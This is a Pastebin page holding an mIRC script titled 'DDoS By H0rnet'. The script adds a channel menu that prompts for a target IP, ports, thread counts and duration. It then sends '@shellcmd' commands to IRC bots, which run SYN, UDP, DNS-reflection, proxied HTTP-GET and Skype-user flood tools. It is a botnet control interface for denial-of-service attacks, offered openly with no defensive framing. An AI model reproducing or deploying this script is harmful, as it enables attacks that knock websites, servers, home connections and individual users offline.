Advertisement
h0rnet

;DDoS By H0rnet mIRC Script

Apr 7th, 2013
1,224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. ;DDoS by H0rnet mIRC Script
  2. menu channel {
  3. -
  4. DDoS
  5. .-
  6.  
  7. .Site
  8. ..Talk:{
  9. %tlkVar1 = $$?="IP:"
  10. %tlkVar2 = $$?="Port 1:"
  11. %tlkVar3 = $$?="Port 2:"
  12. msg $active @shellcmd ./talk %tlkVar1 %tlkVar2 %tlkVar3
  13. }
  14. ..Juno(TCP SYNC):{
  15. %junVar1 = $$?="IP:"
  16. %junVar2 = $$?="Port 1:"
  17. %junVar3 = $$?="Port 2:"
  18. msg $active @shellcmd ./juno %junVar1 %junVar2 %junVar3
  19. ..Stop:/msg $active @stopcmd
  20. }
  21. ..Slice:{
  22. %sVar1 = $$?="random (o):"
  23. %sVar2 = $$?="IP :"
  24. %sVar3 = $$?="Port 1(lower):"
  25. %sVar4 = $$?="Port 2(higher):"
  26.  
  27. msg $active @shellcmd ./sl %sVar1 %sVar2 %sVar3 %sVar4
  28. }
  29. ..B2:{
  30. %bVar1 = $$?="IP :"
  31. %bVar2 = $$?="Time :"
  32.  
  33.  
  34. msg $active @shellcmd ./b2 bang.txt %bVar1 %bVar2
  35. }
  36. ..F4:{
  37. %f4Var1 = $$?="IP :"
  38. %f4Var2 = $$?="Port :"
  39. msg $active @shellcmd ./f4 %f4Var1 65543 %f4Var2
  40. }
  41. ..F:{
  42. %fVar1 = $$?="IP :"
  43. %fVar2 = $$?="Port :"
  44. msg $active @shellcmd ./f %fVar1 65543 %fVar2
  45. }
  46. ..GET:{
  47. %gdpVar1 = $$?="URL :"
  48. %gdpVar2 = $$?="GET/Head/POST :"
  49. %gdpVar3 = $$?="Threads (4k-10k):"
  50. %gdpvar4 = $$?="Time :"
  51. msg $active @shellcmd ./ghp %gdpVar1 %gdpVar2 %gdpVar3 proxies.txt 300 0
  52. }
  53. ..Vadim(Tcp):{
  54. %vVar1 = $$?="IP :"
  55. %vVar2 = $$?="Port :"
  56.  
  57. msg $active @shellcmd ./v2 %vVar1 %vVar2
  58. }
  59. ..Stream (Stream Sites):{
  60. %sreVar1 = $$?="IP :"
  61. %sreVar2 = $$?="Port :"
  62. %sreVar3 = $$?="Size (0 for normal SYN) :"
  63.  
  64. msg $active @shellcmd ./stream %sreVar1 %sreVar2 %sreVar3
  65. }
  66. .Server/Home
  67. ..Stealth(Home):{
  68. %stVar1 = $$?="IP :"
  69. %stVar2 = $$?="Port :"
  70. msg $active @shellcmd ./std %stVar1 %stVar2
  71. }
  72. ..S:{
  73. %ssVar1 = $$?="IP :"
  74. %ssVar2 = $$?="Port :"
  75. msg $active @shellcmd ./s %ssVar1 %ssVar2
  76. ..Stop:/msg $active @stopcmd
  77. }
  78.  
  79. ..UDP:{
  80. %ucpVar1 = $$?="IP :"
  81. %ucpVar2 = $$?="Port :"
  82. %ucpVar3 = $$?="Threads (4k-10k):"
  83. %ucpvar4 = $$?="Time :"
  84. msg $active @shellcmd ./udp %ucpVar1 %ucpVar2 dns.txt %ucpVar3 %ucpVar4
  85. }
  86. ..TCP:{
  87. %tcpVar1 = $$?="IP :"
  88. %tcpVar2 = $$?="Port :"
  89. %tcpVar3 = $$?="Threads (4k-10k):"
  90. %tcpvar4 = $$?="Time :"
  91. msg $active @shellcmd ./tcp %tcpVar1 %tcpVar2 %tcpVar3 %tcpVar4
  92. }
  93. ..Skype:{
  94. %skypVar1 = $$?="Skype Username :"
  95. %skypVar2 = $$?="Thread :"
  96.  
  97. msg $active @shellcmd ./tcp %skypVar1 dns.txt %skypVar2 -1
  98. }
  99.  
  100. .Stop:/msg $active @stopcmd
  101.  
  102.  
  103.  
  104.  
  105. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement